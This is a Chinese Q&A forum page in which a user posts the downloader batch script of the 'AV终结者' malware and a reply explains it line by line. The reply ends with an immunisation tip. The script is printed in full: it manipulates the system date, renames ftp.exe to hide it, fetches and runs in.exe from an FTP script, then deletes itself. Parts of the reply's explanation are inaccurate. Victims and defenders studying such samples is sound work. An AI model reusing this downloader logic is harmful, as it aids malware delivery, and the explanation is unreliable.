看看这个批处理

来源:百度知道 编辑:UC知道 时间:2024/05/12 12:04:35
set a=2007-08-30 星期四
date=2099-01-01
if exist C:\windows\system32\dllcache\ftp.exe ren C:\windows\system32\dllcache\ftp.exe sft.exe
if exist C:\windows\system32\ftp.exe ren C:\windows\system32\ftp.exe sft.exe
sft.exe -s:C:\windows\help.dll
if not exist in.exe ftp -s:C:\windows\help.dll
in.exe
in.exe
date=%a%
:end
del C:\windows\help.dll
del C:\windows\BEGIN.BAT
exit

一个星期中的A V终结者
真是厉害 昨天没搞死 今天终于做了系统
不知道还残留没
这是昨天我找到的 一个下载者的批处理
应该是属于第二个运行的 我看不懂

set a=2007-08-30 星期四
定义一个变量 用来保存时间
date=2099-01-01
定义变量,保存日期
if exist C:\windows\system32\dllcache\ftp.exe ren C:\windows\system32\dllcache\ftp.exe sft.exe
如果存在ftp.exe把它重命名为sft.exe
if exist C:\windows\system32\ftp.exe ren C:\windows\system32\ftp.exe sft.exe
如果存在ftp.exe把它重命名为sft.exe
sft.exe -s:C:\windows\help.dll
用ftp.exe来调用help.dll
if not exist in.exe ftp -s:C:\windows\help.dll

in.exe
in.exe
调用in.exe

date=%a%
把日期设置为上面定义的日期
:end
del C:\windows\help.dll
del C:\windows\BEGIN.BAT
删除自身文件。
exit
退出

C:\WINDOWS目录下自己创建一个begin.bat文件。属性设置为只读。